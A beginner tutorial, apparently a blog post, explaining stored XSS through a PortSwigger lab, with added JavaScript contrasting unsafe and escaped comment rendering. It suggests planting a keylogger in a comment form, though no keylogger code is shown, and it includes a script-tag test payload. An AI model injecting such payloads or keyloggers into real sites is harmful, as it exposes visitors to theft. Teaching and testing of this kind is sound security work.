XSS Vulnerability Part 2
Greetings, hackers! In the first part we covered what XSS is and a simple example of a reflected XSS attack. In this article we will talk about stored XSS.
What is Stored XSS?
Stored XSS occurs when a web application stores unvalidated data, for example in a database, and includes it in its subsequent HTTP responses. Let’s imagine a programmer’s blog where you can leave a comment under each article, but since our programmer is not a professional, he forgot to filter the comments. We, as pentesters whom the programmer has hired for a penetration test, are trying to find an XSS vulnerability. On the page we see a nice comment form, so let’s put a keylogger there.
keylogger.js :
Now the keylogger will run for everyone who visits this site.
Okay, enough fantasizing, let’s try payloads on a form ourselves. We will use a lab from PortSwigger.

Initially, we see a simple blog page with different articles. We need an input form.

On the post page, we can see that we have a comment form.

From the lab description, we learn that we need to call alert(). However, if you use Chrome, from version 92 onward (July 20th, 2021) cross-origin iframes are prevented from calling alert(), so we can use print() instead.

We receive confirmation that our comment has been successfully submitted. The lab is already solved, but let’s try to return to the page.

We get an alert message.
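Why the comment fires again on every later visit, and how encoding on output stops it, shown as an added example that is not part of the original article or of the PortSwigger lab. The function names and the sample comments are assumptions constructed for illustration.

```javascript
// Added illustration: a minimal in-memory "comment store" for a blog post.
// All names (saveComment, renderUnsafe, renderSafe) are hypothetical.
const comments = []; // stands in for the database

function saveComment(author, body) {
  // Stored exactly as submitted; the flaw is in how it is rendered later.
  comments.push({ author, body });
}

// Vulnerable: stored text is concatenated into HTML, so any markup in a
// comment becomes part of the page served to every later visitor.
function renderUnsafe() {
  return comments
    .map(c => `<section><p>${c.author}</p><p>${c.body}</p></section>`)
    .join("\n");
}

// Escape the characters that are significant in HTML text and in
// quoted attribute values.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, ch => map[ch]);
}

// Hardened: encode at output time, for the context the data lands in.
function renderSafe() {
  return comments
    .map(c => `<section><p>${escapeHtml(c.author)}</p><p>${escapeHtml(c.body)}</p></section>`)
    .join("\n");
}

// Constructed sample input: one ordinary comment and one test comment.
saveComment("alice", "Nice article & thanks!");
saveComment("tester", "<script>alert(1)</script>");

console.log("unsafe:\n" + renderUnsafe());
console.log("safe:\n" + renderSafe());
```

The escaping shown covers HTML text and quoted attributes only; data placed inside a script block, a URL or a style needs the encoding for that context.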
The examples are very simple, just for beginners. In the next part, we will cover more advanced topics. Thank you!